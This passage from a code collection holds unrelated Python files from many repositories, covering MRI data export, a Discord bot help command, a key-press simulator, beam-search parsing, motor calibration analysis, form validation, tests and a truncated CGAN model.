nib.save(nib.Nifti1Image(np.fliplr(np.rot90(np.transpose(ar[::-1], (1,2,0)))), np.eye(4)), f"{filename}.nii.gz")
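# Minimal end-to-end sketch (hypothetical file names -- the DICOM path and output
# name below are assumptions, not part of this module):
#
#   ds = DWIDataset("dwi_multiframe.dcm")      # loads and rescales the multiframe DICOM
#   adc = get_ADC_dataset(ds, n_jobs=-1)       # stack of per-slice ADC maps
#   d_maps, k_maps = get_DKI_dataset(ds)       # per-slice D and K maps
#   save_nii(adc, "adc")                       # writes adc.nii.gz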
| 7,732 |
backend/lookup/admin.py
|
AISVisioner/cameraDetector
| 0 |
2023416
|
from django.contrib import admin
from .models import Visitor
@admin.register(Visitor)
class UserAdmin(admin.ModelAdmin):
date_hierarchy = 'created_at'
readonly_fields = ('recent_access_at','created_at',)
| 212 |
cogs/help.py
|
ConchDev/Example-Leveling-System
| 1 |
2022754
|
import discord
from discord.ext import commands
cmds = {
"rank" : {
"title": "Rank command",
"desc": "Shows a member's rank",
"aliases": "None",
"usage": "```rank [member]```",
"cooldown" : "`5`s"
},
"leaderboard" : {
"title": "Leaderboard command",
"desc": "Shows the top 10 in the leaderboard. **True** is **global** and **False** is **guild only**",
"aliases": "None",
"usage": "```leaderboard [true/false]```",
"cooldown" : "`5`s"
},
"set" : {
"title": "set command",
"desc": "To set a user's xp/level",
"aliases": "None",
"usage" : "```set [level/xp] [member] [amount]```",
"cooldown" : "None"
},
"restart" : {
"title": "Restart command",
"desc": "Restart the Bot",
"aliases": "None",
"usage" : "```restart```",
"cooldown" : "None"
},
"shutdown" : {
"title": "Shutdown command",
"desc": "Shutdowns the bot",
"aliases": "close",
"usage" : "```shutdown```",
"cooldown" : "None"
},
"refresh" : {
"title": "Refresh command",
"desc": "Refresh the current code with the code on github",
"aliases": "pull",
"usage" : "```refresh```",
"cooldown" : "None"
},
"load" : {
"title": "Load command",
"desc": "Load a module",
"aliases": "None",
"usage" : "```load [module name]```",
"cooldown" : "None"
},
"unload" : {
"title": "Unload command",
"desc": "Unload a module",
"aliases": "None",
"usage" : "```unload [cog name]```",
"cooldown" : "None"
},
"reload" : {
"title": "Reload command",
"desc": "Reload a module",
"aliases": "None",
"usage" : "```reload [module name]```",
"cooldown" : "None"
},
"uptime" : {
"title": "Uptime command",
"desc": "See Bot's Uptime",
"aliases": "None",
"usage" : "```uptime```",
"cooldown" : "`5`s"
},
"source" : {
"title": "Source command",
"desc": "Get the bot source code",
"aliases": "github/code",
"usage" : "```uptime```",
"cooldown" : "`5`s"
},
"stats" : {
"title": "Stats command",
"desc": "See bot's stats",
"aliases": "statistics",
"usage" : "```stats```",
"cooldown" : "`5`s"
},
"eval" : {
"title": "Eval command",
"desc": "Evaluate code (command stays hidden from help command)",
"aliases": "None",
"usage" : "```stats```",
"cooldown" : "None"
},
"image" : {
"title": "Image command",
"desc": "Change background for rank command",
"aliases": "None",
"usage" : "```image [url]```",
"cooldown" : "`5`s"
}
}
class helpcommand(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def help(self, ctx, *, command=None):
if command is None:
embed = discord.Embed(title="Help", description="Commands", color=discord.Color.red())
embed.add_field(name="Level", value="Shows a member's rank")
embed.add_field(name="Leaderboard", value="Shows the top 10 in the leaderboard. **True** is **global** and **False** is **guild only**")
embed.add_field(name="Set", value="Sets a user's xp or level")
embed.add_field(name="Usage:", value="```\nrank [member]```")
embed.add_field(name="Usage:", value="```\nleaderboard [true/false]```")
embed.add_field(name="Usage:", value="```\nset [level/xp] [member] [amount]```")
embed.add_field(name="Image", value="Change background for rank command")
embed.add_field(name="Restart", value="Restart the Bot")
embed.add_field(name="Refresh", value="Refresh the current code with the code on github")
embed.add_field(name="Usage:", value="```\nrestart```")
embed.add_field(name="Usage:", value="```\nimage [url]```")
embed.add_field(name="Usage:", value="```\nrefresh```")
embed.add_field(name="Load", value="Load a module")
embed.add_field(name="Unload", value="Unload a module")
embed.add_field(name="Reload", value="Reload a module")
embed.add_field(name="Usage:", value="```\nload [module name]```")
embed.add_field(name="Usage:", value="```\nunload [module name]```")
embed.add_field(name="Usage:", value="```\nreload [module name]```")
embed.add_field(name="Uptime", value="See Bot's Uptime")
embed.add_field(name="Source", value="Get the bot source code")
embed.add_field(name="Stats", value="See bot's stats")
embed.add_field(name="Usage:", value="```\nuptime```")
embed.add_field(name="Usage:", value="```\nsource [command name]```")
embed.add_field(name="Usage:", value="```\nstats```")
embed.set_thumbnail(url=self.bot.user.avatar_url)
embed.set_footer(text=f"Requested by {ctx.author.name}#{ctx.author.discriminator}", icon_url=ctx.author.avatar_url)
await ctx.send(embed=embed)
else:
try:
command = command.lower()
embed = discord.Embed(title=cmds[command].get("title"))
embed.add_field(name="Description:", value=cmds[command].get("desc"), inline=False)
embed.add_field(name="Aliases:", value=cmds[command].get("aliases"), inline=False)
embed.add_field(name="Cooldown:", value=cmds[command].get("cooldown"), inline=False)
embed.add_field(name="Usage:", value=cmds[command].get("usage"), inline=False)
embed.set_footer(text=f"Requested by {ctx.author.name}#{ctx.author.discriminator}", icon_url=ctx.author.avatar_url)
await ctx.send(embed=embed)
except:
await ctx.send("Command not found")
def setup(bot):
bot.add_cog(helpcommand(bot))
| 6,175 |
simulate_keyboard.py
|
xk19yahoo/SimulateKeyboard
| 0 |
2023538
|
#coding=cp936
import win32gui,win32api,win32con
import time
import threading
def key():
interval = 0.3
while True:
time.sleep(interval )
        win32api.keybd_event(65,0,0,0)  # 65 is the virtual-key code for 'A'
win32api.keybd_event(65,0,win32con.KEYEVENTF_KEYUP,0)
t = threading.Thread(target=key)
t.start()
| 310 |
tensor2struct/models/overnight/overnight_beam_search.py
|
chenyangh/tensor2struct-public
| 69 |
2022881
|
import attr
import copy
import operator
import torch
import torch.nn.functional as F
from tensor2struct.datasets import overnight
from tensor2struct.utils import registry
import tensor2struct.languages.dsl.common.errors as lf_errors
import tensor2struct.languages.dsl.common.util as lf_util
@attr.s
class Hypothesis:
inference_state = attr.ib()
next_choices = attr.ib()
score = attr.ib(default=0)
choice_history = attr.ib(factory=list)
score_history = attr.ib(factory=list)
@attr.s
class Candidate:
hyp = attr.ib()
choice = attr.ib()
choice_score = attr.ib()
cum_score = attr.ib()
@registry.register("infer_method", "overnight_beam_search")
def overnight_beam_search(model, orig_item, preproc_item, beam_size, max_steps):
"""
    Beam search; the finished hypotheses are then filtered by execution.
"""
orig_beam_size = beam_size
beam_size = beam_size * 2
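    # Search with a doubled beam so that, after hypotheses whose logical forms fail
    # to execute are filtered out, up to the originally requested beam size survives.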
ret_state = model(orig_item, preproc_item, compute_loss=False, infer=True)
inference_state, next_choices = (
ret_state["initial_state"],
ret_state["initial_choices"],
)
beam = [Hypothesis(inference_state, next_choices)]
finished = []
for step in range(max_steps):
if len(finished) == beam_size:
break
candidates = []
for hyp in beam:
candidates += [
Candidate(
hyp, choice, choice_score.item(), hyp.score + choice_score.item()
)
for choice, choice_score in hyp.next_choices
]
# Keep the top K expansions
candidates.sort(key=operator.attrgetter("cum_score"), reverse=True)
candidates = candidates[: beam_size - len(finished)]
# Create the new hypotheses from the expansions
beam = []
for candidate in candidates:
inference_state = candidate.hyp.inference_state.clone()
next_choices = inference_state.step(candidate.choice)
new_hyp = Hypothesis(
inference_state,
next_choices,
candidate.cum_score,
candidate.hyp.choice_history + [candidate.choice],
candidate.hyp.score_history + [candidate.choice_score],
)
if next_choices is None:
finished.append(new_hyp)
else:
beam.append(new_hyp)
# filter by execution
lfs = []
for hyp in finished:
_, lf = hyp.inference_state.finalize()
lfs.append(lf)
denotations = overnight.execute(lfs, orig_item.domain)
executables = []
for beam, d in zip(finished, denotations):
if d is not None:
executables.append(beam)
executables.sort(key=operator.attrgetter("score"), reverse=True)
executables = executables[:orig_beam_size]
return executables
def have_mentioned_vp(prods, mentions):
"""
    Heuristics to make sure that mentioned entities and properties are predicted
"""
if len(mentions["exact"]["property"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["exact"]["property"]
):
em_p_flag = False
else:
em_p_flag = True
if len(mentions["exact"]["value"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["exact"]["value"]
):
em_v_flag = False
else:
em_v_flag = True
if len(mentions["partial"]["property"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["partial"]["property"]
):
pa_p_flag = False
else:
pa_p_flag = True
if len(mentions["partial"]["value"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["partial"]["value"]
):
pa_v_flag = False
else:
pa_v_flag = True
# if all([em_v_flag, em_p_flag, pa_p_flag, pa_v_flag]):
if em_p_flag:
return True
else:
return False
| 3,947 |
UE4Parse/IO/IoObjects/FIoDirectoryIndexEntry.py
|
zbx911/pyUE4Parse
| 0 |
2023041
|
from UE4Parse.BinaryReader import BinaryStream
class FIoDirectoryIndexEntry:
Name: int
FirstChildEntry: int
NextSiblingEntry: int
FirstFileEntry: int
def __init__(self, reader: BinaryStream):
self.Name, self.FirstChildEntry, self.NextSiblingEntry, self.FirstFileEntry = reader.unpack2('4I', 4*4)
# self.Name = reader.readUInt32()
# self.FirstChildEntry = reader.readUInt32()
# self.NextSiblingEntry = reader.readUInt32()
# self.FirstFileEntry = reader.readUInt32()
| 529 |
voice/retrieve-info-for-a-call.py
|
arshadkazmi42/nexmo-python-quickstart
| 0 |
2023153
|
#!/usr/bin/env python3
import nexmo
from pprint import pprint
client = nexmo.Client(
application_id=APPLICATION_ID,
private_key=APPLICATION_PRIVATE_KEY_PATH,
)
# Note: the lookup can be made for a current call or a completed call
response = client.get_call("NEXMO_CALL_UUID")
pprint(response)
| 293 |
im2py.py
|
CYDROM/Open-Manager
| 0 |
2023272
|
import base64
open_icon = open("Myshortcut.ico","rb")
b64str = base64.b64encode(open_icon.read())
open_icon.close()
write_data = "MYICO = '%s'\n" % b64str.decode()
f = open("icon.py","w+")
f.write(write_data)
open_icon = open("add_new.ico","rb")
b64str = base64.b64encode(open_icon.read())
open_icon.close()
write_data = "ADDICO = '%s'" % b64str.decode()
f.write(write_data)
f.close()
| 408 |
modelcobras/movement.py
|
ekadofong/mk_motormap
| 0 |
2023057
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
def read ( fname ):
df = pd.read_csv ( fname, names = 'x y theta phi time'.split () )
#df['x'] *= 0.06
#df['y'] *= 0.06
home = df.loc[0,'x'], df.loc[0,'y']
df['dist'] = np.sqrt((df['x'] - home[0])**2 + (df['y']-home[1])**2.)*1000.
return df
def read_convergencedata ( fname ):
rawconv = pd.read_csv ( fname, header=None )
conv = rawconv[[33,13,17,18,1,16,34,7]]
conv.columns = 'J1 J2 J1_s J2_s iter dist J1_t J2_t'.split ()
dphi = conv['J2'][1:].values - conv['J2'][:-1]
dtheta = conv['J1'][1:].values - conv['J1'][:-1]
conv['J1_stepsize'] = dtheta / conv['J1_s']
conv['J2_stepsize'] = dphi / conv['J2_s']
conv['time'] = conv.index
return conv
def read_ctrlstep ( fname, stepseq = [100.,50.], verbose=False, motor_id=2, movesize=400 ):
if motor_id == 2:
aname = 'phi'
else:
aname = 'theta'
df = read(fname)
mm = df.apply ( lambda row: 'NAN' in str(row[aname]), axis=1 )
df = df.loc[~mm].astype(float)
#print(df['phi'].astype(float))
mdf = pd.DataFrame(index=df.index[1:], columns=['xpix', 'ypix', 'startangle','d'+aname,'movesize','stepsize'])
mdf['startangle'] = df[aname][:-1]
mdf['d' + aname ] = df[aname][1:].values - df[aname][:-1]
mdf['xpix'] = df['x']
mdf['ypix'] = df['y']
mdf['move_phys'] = np.sqrt((df['x'][1:].values - df['x'][:-1])**2 + (df['y'][1:].values - df['y'][:-1])**2)*90.
mdf['iter'] = 0
mdf['stepsize'] = 0.
stake = 0
if (movesize is None):
if verbose:
print('Attempting to infer move size...')
# Need to account for when motor 1 goes from 360 -> 0
namask = np.isfinite(mdf['d'+aname])
if motor_id == 2:
if stepseq[0] > 0:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[:len(stepseq)].index.sort_values()
else:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[-len(stepseq):].index.sort_values()
else:
if stepseq[0] > 0:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[len(stepseq):2*len(stepseq)].index.sort_values()
else:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[-len(stepseq)*2:-len(stepseq)].index.sort_values()
elif movesize == 0:
mdf['iter'] = 100
mdf['movesize'] = stepseq
mdf['stepsize'] = mdf['d'+aname]/mdf['movesize']
return mdf
else:
lng = np.arange(1,1+len(stepseq))
homes = np.ones_like(stepseq)*movesize*lng + lng
for idx,cstep in enumerate(stepseq):
#nstake = mdf.iloc[stake:].query('dphi<-10.').iloc[0].name
nstake = homes[idx]
mdf.loc[mdf.index[stake:nstake],'movesize'] = cstep
mdf.loc[mdf.index[stake:nstake],'iter'] = idx
mdf.loc[mdf.index[nstake-1],'stepsize'] = np.NaN
#print(mdf.loc[mdf.index[nstake],'stepsize'])
if verbose:
print('Break @ %i' % nstake)
stake = nstake
mdf['stepsize'] = mdf['d'+aname]/mdf['movesize']
mdf.loc[mdf.index[homes-1], 'stepsize'] = np.NaN
return mdf
def estimate_std ( mdf ):
angle_grid = np.arange(0,180.,6.)
assns = np.digitize ( mdf['startangle'], angle_grid )
stds = mdf.stepsize.groupby(assns).std()
stds = stds.replace ( np.NaN, 100.)
mdf['u_stepsize'] = stds.loc[assns].values
return mdf
def read_mdf ( fname ):
df = read(fname)
mdf = pd.DataFrame(index=df.index[1:], columns=['xpix','ypix','startangle','dphi','movesize','stepsize'])
mdf['startangle'] = df['phi'][:-1]
mdf['movesize'] = 0.
#mdf['movesize'] = 15.*(1.-mdf.index%2) -5.*(mdf.index%2)
mdf['xpix'] = df['x']
mdf['ypix'] = df['y']
mdf['dphi'] = df['phi'][1:].values - df['phi'][:-1]
mdf.loc[mdf['dphi']>0, 'movesize'] = 15.
mdf.loc[mdf['dphi']<0, 'movesize'] = -5.
#mdf.loc[mdf.index[::2],'movesize'] = 15.
#mdf.loc[mdf.index[1::2],'movesize'] = -5.
mdf['stepsize'] = mdf['dphi']/mdf['movesize']
mdf['is_fwd'] = np.sign(mdf['movesize']) > 0
return mdf
def plot ( df, axarr, cmap='PiYG', lbl=None ):
axarr[0].scatter ( df['x'], df['y'], s=9, c=df.index % 2,
cmap=cmap, alpha=0.8, label=lbl)
axarr[0].set_aspect('equal','datalim' )
axarr[1].scatter ( df.index, df['dist'], s=18, c=df.index % 2,
cmap=cmap, alpha=0.8 )
[ axarr[i].grid(alpha=0.4) for i in range(2) ]
axarr[0].set_xlabel ( 'x (mm)' )
axarr[0].set_ylabel ( 'y (mm)' )
axarr[1].set_xlabel ( 'time (step #)')
axarr[1].set_ylabel ( r'distance from start ($\mu$m)')
plt.tight_layout ()
return axarr
def run ( ):
dirnames = ['18_04_25_10_11_47_erin_test/',
'18_04_25_11_12_44_erin_test/',
'18_04_25_12_26_06_erin_test/']
cmaps=['PiYG','RdBu','PuOr_r']
labels=['Run 1','Run 2','Run 3']
for pid in range(1,57):
fig,axarr = plt.subplots(1,2,figsize=(10,4))
for i,cdir in enumerate(dirnames):
fname = './%s/Log/PhiSpecMove_mId_1_pId_%i.txt' % (cdir,pid)
df = read(fname)
plot ( df, axarr, cmaps[i] )
plt.savefig('./timevol_pid%i.png'%pid)
plt.close ()
def clean_map(ctrlstep):
ctrlstep = ctrlstep.convert_objects ()
#// filter ctrlstep based on Johannes' suggestions
lowthresh = 0.01
ctrlstep.loc[ctrlstep['stepsize'] < 0, 'stepsize'] = np.nan
ctrlstep.loc[ctrlstep['stepsize'] > 1., 'stepsize'] = np.nan
bins = np.arange ( 0., 400., 10. )
assns = np.digitize ( ctrlstep['startangle'], bins )
grps = ctrlstep.groupby ( assns )
ssmean = grps.mean()['stepsize']
sscount = grps.count()['stepsize']
#// cut on mean change or overpopulation
deltam = abs(ssmean-ssmean.mean()) > 3.*ssmean.std()
deltact = abs(sscount-sscount.mean()) > 3.*sscount.std()
to_cut = ssmean.index[deltam|deltact]
ctrlstep.loc[np.in1d(assns, to_cut),'stepsize'] = np.NaN
mm = np.isfinite(ctrlstep).all(axis=1)
return ctrlstep.loc[mm]
def read_tso ( specdir, pid, niter=3 ):
po = read_ctrlstep ( specdir + '/PhiSpecMove_mId_1_pId_%i.txt'%pid,
movesize=None)
if not po.iloc[niter]['startangle'] < po.iloc[0]['startangle']:
#// check to make sure that the motor got all the way back home.
#// If not, discard
print ("PID %i did not make it home! :(" % pid )
return None
benchmarks = po.iloc[:niter+1]['startangle'].sort_values ()
diff = benchmarks.diff ()/2
po['movestate'] = np.nan
po.loc[:niter,'movestate'] = range(1,niter+1)
po.loc[niter+1,'movestate'] = 0
for idx in po.index:
bench = po.groupby('movestate').apply ( lambda x: x.iloc[-1] )
po.loc[idx,'movestate'] = abs(po.loc[idx,'startangle'] - bench['startangle']).argmin()
return po
| 7,122 |
app/gui/utils.py
|
ammar369/RM-Automation-Py
| 0 |
2023808
|
import os
from pathlib import Path
from PIL import ImageTk, Image
from app.utils import form_logger
from app.rmbot.config import TODAY_DDMMYYYY
from app.gui.config import (
VALID_EXTENSIONS,
VALID_UPPERCASE,
VALID_NUMBER,
IMAGE_WIDTH,
IMAGE_HEIGHT,
MAX_DEPRECIATION,
VALID_INTIMATION_PREFIX,
LOCATION_OPTIONS,
)
gui_logger = form_logger("guiLogger")
rm_logger = form_logger("rmLogger")
def correct_loss_no(value: str):
if len(value) == 13:
year_no = value[-2:]
final_value = value[0:10] + r"/20" + year_no
        rm_logger.debug(f"fixed loss no: {value} -> {final_value}")
else:
final_value = value
return final_value
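# Illustrative example (hypothetical value, not real data): a 13-character loss
# number with a two-digit year, e.g. "1234567890/21", is expanded by the function
# above to "1234567890/2021".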
def correct_empty_text(value: str):
if value is None:
fixed_value = " "
else:
fixed_value = value
return fixed_value
def correct_netpayable(value: str):
if value is None or value == "0" or value == "":
value = "1"
new_value = float_to_int(value=value)
return new_value
def correct_empty_number(value):
if value is None or value == "":
fixed_value = "1"
else:
fixed_value = value
return fixed_value
def float_to_int(value: str):
reformed_value = correct_empty_number(value=value)
new_value1 = reformed_value.replace(",", "")
new_value2 = new_value1.replace(" ", "")
return int(float(new_value2))
def correct_speedometer(value: str):
new_value = ""
for char in value:
if char in VALID_NUMBER:
new_value += char
return float_to_int(value=new_value)
def validate_date(date_string):
for char in date_string:
if char in VALID_UPPERCASE:
return (False, TODAY_DDMMYYYY)
return (True, date_string)
def check_intimation(intimation_no: str):
if len(intimation_no) == 9:
intimationFlag = (
(intimation_no.find("/", 6, 7) == -1)
| (intimation_no[0] not in VALID_INTIMATION_PREFIX[0:6])
| (intimation_no[1] not in VALID_NUMBER)
| (intimation_no[2] not in VALID_NUMBER)
| (intimation_no[3] not in VALID_NUMBER)
| (intimation_no[4] not in VALID_NUMBER)
| (intimation_no[5] not in VALID_NUMBER)
| (intimation_no[7] not in VALID_NUMBER)
| (intimation_no[8] not in VALID_NUMBER)
)
gui_logger.debug(f"Intimation flag raised: {intimationFlag}")
return intimationFlag
elif len(intimation_no) == 10:
intimationFlag = (
(intimation_no.find("/", 7, 8) == -1)
| (intimation_no[0:2] != VALID_INTIMATION_PREFIX[6])
| (intimation_no[2] not in VALID_NUMBER)
| (intimation_no[3] not in VALID_NUMBER)
| (intimation_no[4] not in VALID_NUMBER)
| (intimation_no[5] not in VALID_NUMBER)
| (intimation_no[6] not in VALID_NUMBER)
| (intimation_no[8] not in VALID_NUMBER)
| (intimation_no[9] not in VALID_NUMBER)
)
gui_logger.debug(f"Intimation flag raised: {intimationFlag}")
return intimationFlag
else:
gui_logger.debug(f"Intimation flag raised: {True}")
return True
def check_survey_conductor(survey_conductor: str):
surveyConductorFlag = (len(survey_conductor) < 1) | (
any(x in survey_conductor for x in VALID_NUMBER)
)
gui_logger.debug(f"Survey conductor flag raised: {surveyConductorFlag}")
return surveyConductorFlag
def check_workshop_name(workshop_name: str):
workshopFlag = len(workshop_name) < 6
gui_logger.debug(f"Workshop name flag raised: {workshopFlag}")
return workshopFlag
def check_workshop_contact(workshop_contact: str):
contactFlag = (len(workshop_contact) < 4) | (
any(x in workshop_contact for x in VALID_NUMBER)
)
gui_logger.debug(f"Workshop contact flag raised: {contactFlag}")
return contactFlag
def check_directory(image_folder_path: str):
valid_files = get_image_names(image_folder_path)
# gui_logger.debug(f"Image list: {valid_files}")
gui_logger.debug(f"Number of images found: {len(valid_files)}")
if len(valid_files) >= 1:
gui_logger.debug("Image folder flag raised: False")
return False
else:
gui_logger.debug("Image folder flag raised: True")
return True
def check_depreciation(depreciation: str, max_depreciation=MAX_DEPRECIATION):
try:
if depreciation is None or depreciation == "":
depreciation = 0
depreciationFlag = int(depreciation) > max_depreciation
except ValueError:
depreciationFlag = True
finally:
gui_logger.debug(f"Depreciation flag raised: {depreciationFlag}")
return depreciationFlag
def check_location(location):
if location not in LOCATION_OPTIONS:
return True
else:
return False
def get_image_names(folder_path):
directoryExistsFlag = os.path.exists(folder_path)
if directoryExistsFlag:
valid_images = [
name
for name in os.listdir(Path(folder_path))
if os.path.isfile(Path(folder_path) / name)
and Path(Path(folder_path) / name).suffix in VALID_EXTENSIONS
]
else:
gui_logger.error("IMAGE FOLDER DOES NOT EXIST")
valid_images = []
return valid_images
def get_image_paths(folder_path):
image_list = []
image_names = get_image_names(folder_path)
if len(image_names) >= 1:
for image_name in image_names:
image_path = folder_path + "/" + image_name
image_list.append(image_path)
else:
gui_logger.error("VALID IMAGES NOT FOUND")
return image_list
def initialize_image(image_path=None, width=IMAGE_WIDTH, height=IMAGE_HEIGHT):
rawImage = Image.open(image_path)
resizedImage = rawImage.resize((width, height))
image = ImageTk.PhotoImage(resizedImage)
return image
| 5,950 |
scripts/parse_old_annotations.py
|
gokhankici/iodine
| 9 |
2023546
|
#!/usr/bin/env python3
import collections
import json
import sys
import re
sources = set()
sinks = set()
initial_eq = set()
always_eq = set()
assert_eq = set()
initial_eq_mod = collections.defaultdict(set)
qualif_implies = set()
qualif_pairs = set()
def update_annots(typ, val):
val = val.replace(" ", "")
if typ == "taint_source":
sources.add(val)
elif typ == "taint_sink":
sinks.add(val)
elif typ == "sanitize":
initial_eq.update(val.split(","))
elif typ == "sanitize_mod":
[m,v] = val.split(",")
initial_eq_mod[m].add(v)
elif typ == "sanitize_glob":
always_eq.add(val)
elif typ == "assert_eq":
assert_eq.add(val)
elif typ == "qualifierImp":
        m = re.match(r"(.*),\[(.*)\]", val)
lhs = m.group(1)
rhs = m.group(2).split(",")
qualif_implies.add((lhs, frozenset(rhs)))
elif typ == "qualifierPairs":
vs = val[1:-1].split(",") # remove the surrounding brackets
qualif_pairs.add(frozenset(vs))
else:
print("Unknown annotation: @annot{{{}({})}}".format(typ, val),
file=sys.stderr)
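# Illustrative examples of the "// @annot{...}" source comments this script parses.
# The annotation types come from the branches above; the variable and module names
# are hypothetical:
#   // @annot{taint_source(in_data)}
#   // @annot{taint_sink(out_data)}
#   // @annot{sanitize(a, b)}
#   // @annot{sanitize_mod(my_module, reg_x)}
#   // @annot{qualifierImp(lhs_var,[rhs1,rhs2])}
#   // @annot{qualifierPairs([v1,v2])}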
with open(sys.argv[1], "r") as f:
for l in f:
l = l.strip()
        for result in re.finditer(r"//\s*@annot{(.+)\((.+)\)}", l):
t = result.group(1)
a = result.group(2)
update_annots(t, a)
result = collections.defaultdict(list)
def go_annot(var_set, type_name, module=None):
if len(var_set) > 0:
r = {"type": type_name, "variables": list(sorted(var_set))}
if module is not None:
r["module"] = module
result["annotations"].append(r)
go_annot(sources, "source")
go_annot(sinks, "sink")
go_annot(assert_eq, "assert_eq")
go_annot(always_eq, "always_eq")
go_annot(initial_eq, "initial_eq")
for m in initial_eq_mod:
go_annot(initial_eq_mod[m], "initial_eq", module=m)
for lhs, rhs in qualif_implies:
result["qualifiers"].append({"type": "implies", "lhs": lhs, "rhs": list(rhs)})
for vs in qualif_pairs:
result["qualifiers"].append({"type": "pairs", "variables": list(vs)})
print(json.dumps(result, indent=2))
| 2,175 |
tamr_client/_beta.py
|
ianbakst/tamr-client
| 9 |
2023307
|
import os
import sys
def check():
env_var = "TAMR_CLIENT_BETA"
is_beta_enabled = os.environ.get(env_var) == "1"
if not is_beta_enabled:
msg = (
f"ERROR: 'tamr_client' package is in BETA, but you do not have the '{env_var}' environment variable set to '1'."
"\n\nHINT: For non-BETA features, use only the 'tamr_unify_client' package."
f"\nHINT: To opt-in to BETA features, set environment variable: '{env_var}=1'."
"\n\nWARNING: Do not rely on BETA features in production workflows."
" Support from Tamr may be limited."
)
print(msg)
sys.exit(1)
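# Example (shell): opt in to BETA features before running code that calls check(),
# as described in the error message above:
#   export TAMR_CLIENT_BETA=1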
| 652 |
src/test_insertion_sort.py
|
thejohnjensen/data_structures_2
| 0 |
2023620
|
"""."""
from insertion_sort import insertion
from random import randint
import pytest
def test_insertion():
"""Test with random list."""
unsorted = [randint(0, 1000000) for i in range(1000)]
assert insertion(unsorted) == sorted(unsorted)
def test_insertion_worse_case():
"""Test with reversed list."""
reverse = [i for i in range(1000)]
reverse.reverse()
assert insertion(reverse) == sorted(reverse)
def test_insertion_passed_a_string():
"""Test that raises error."""
with pytest.raises(TypeError):
assert insertion('hello')
def test_insertion_empty_list():
"""Test that properly handles an empty list."""
assert insertion([]) == []
def test_insertion_in_order():
"""Test doesn't mess with my list when in order."""
in_order = [i for i in range(1000)]
assert insertion(in_order) == in_order
| 864 |
dffml/util/tempdir.py
|
sauravsrijan/dffml
| 0 |
2023429
|
# SPDX-License-Identifier: MIT
# Copyright (c) 2019 Intel Corporation
"""
Create and remove OS temporary directories.
"""
import queue
import shutil
import os.path
import tempfile
from typing import List
from .log import LOGGER
LOGGER = LOGGER.getChild("tempdir")
class TempDir(object):
"""
Creates and deletes temporary directories. Removes any created directories
when the program using this class terminates (see rmtempdirs for details).
"""
SUFFIX: str = None
PREFIX: str = "dffml_"
def __init__(self):
self.suffix = self.__class__.SUFFIX
self.prefix = self.__class__.PREFIX
self.dirs: List[str] = []
def mktempdir(self):
"""
Creates a temporary directory using TempDir's SUFFIX and PREFIX.
Adds the directory to the to be deleted queue.
"""
dirname = tempfile.mkdtemp(suffix=self.suffix, prefix=self.prefix)
LOGGER.debug("Created directory %r", dirname)
self.dirs.append(dirname)
return dirname
def rmtempdirs(self):
"""
        Removes all created temporary directories. Call this method directly,
        register it with atexit.register, or use the async context manager to
        ensure all created directories are removed on termination.
"""
for rmdir in self.dirs:
LOGGER.debug("Removing directory %r", rmdir)
# OSError 39 sometimes if removal isn't attempted twice
shutil.rmtree(rmdir, ignore_errors=True)
shutil.rmtree(rmdir, ignore_errors=True)
async def __aenter__(self):
pass
async def __aexit__(self, exc_type, exc_value, traceback):
self.rmtempdirs()
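# A minimal usage sketch (not part of the original module); the names below are
# illustrative. The async context manager only handles cleanup on exit, so the
# directory itself is created explicitly via mktempdir():
#
#     tmp = TempDir()
#     workdir = tmp.mktempdir()    # returns the path of a fresh temp directory
#     ...                          # write files under workdir
#     tmp.rmtempdirs()             # removes every directory created above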
| 1,652 |
CGAN/cgan_conv_concat.py
|
yangliuav/all-GAN-in-Keras
| 0 |
2023347
|
from __future__ import print_function, division
from keras.datasets import cifar10
from keras.layers import Input, Dense, Reshape, Flatten, Dropout, multiply, Concatenate
from keras.layers import BatchNormalization, Activation, ZeroPadding2D, Embedding
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import sys
import numpy as np
import os
from keras.utils import multi_gpu_model
sys.path.append( os.path.join(os.getcwd(), 'utils'))
import tools as t
multi_gpu = False
class CGAN():
def __init__(self):
# Input shape
self.img_rows = 32
self.img_cols = 32
self.channels = 3
self.img_shape = (self.img_rows, self.img_cols, self.channels)
self.latent_dim = 200
self.num_classes = 10
optimizer = Adam(0.0002, 0.5)
# Build and compile the discriminator
self.discriminator = self.build_discriminator()
if multi_gpu == True:
self.discriminator = multi_gpu_model(self.discriminator)
self.discriminator.compile(loss='binary_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
# Build the generator
self.generator = self.build_generator()
# The generator takes noise as input and generates imgs
noise = Input(shape=(self.latent_dim,))
label = Input(shape=(1,))
img = self.generator([noise, label])
# For the combined model we will only train the generator
self.discriminator.trainable = False
# The discriminator takes generated image as input and determines validity
# and the label of that image
valid = self.discriminator([img, label])
# The combined model (stacked generator and discriminator)
# Trains generator to fool discriminator
self.combined = Model([noise, label], valid)
if multi_gpu == True:
self.combined = multi_gpu_model(self.combined )
self.combined.compile(loss=['binary_crossentropy'], optimizer=optimizer)
def build_generator(self):
noise = Input(shape=(self.latent_dim,))
x1 = Dense(128 * 8 * 8, activation="relu", input_dim=self.latent_dim)(noise)
x1 = Reshape((8, 8, 128))(x1)
label = Input(shape=(1,), dtype='int32')
label_embedding = Flatten()(Embedding(self.num_classes, 8 * 8)(label))
x2 = Dense(8 * 8, activation="relu")(label_embedding)
x2 = Reshape((8, 8, 1))(x2)
x = Concatenate()([x1,x2])
x = LeakyReLU(alpha=0.2)(x)
x = BatchNormalization(momentum=0.8)(x)
x = UpSampling2D()(x) # Conv2DTranspose
x = Conv2D(128, kernel_size=3, padding="same")(x)
x = LeakyReLU(alpha=0.2)(x)
x = BatchNormalization(momentum=0.8)(x)
x = UpSampling2D()(x)
x = Conv2D(64, kernel_size=3, padding="same")(x)
x = LeakyReLU(alpha=0.2)(x)
x = BatchNormalization(momentum=0.8)(x)
x = Conv2D(self.channels, kernel_size=3, padding="same")(x)
img = Activation("tanh")(x)
return Model([noise, label], img)
def build_discriminator(self):
img = Input(shape=self.img_shape)
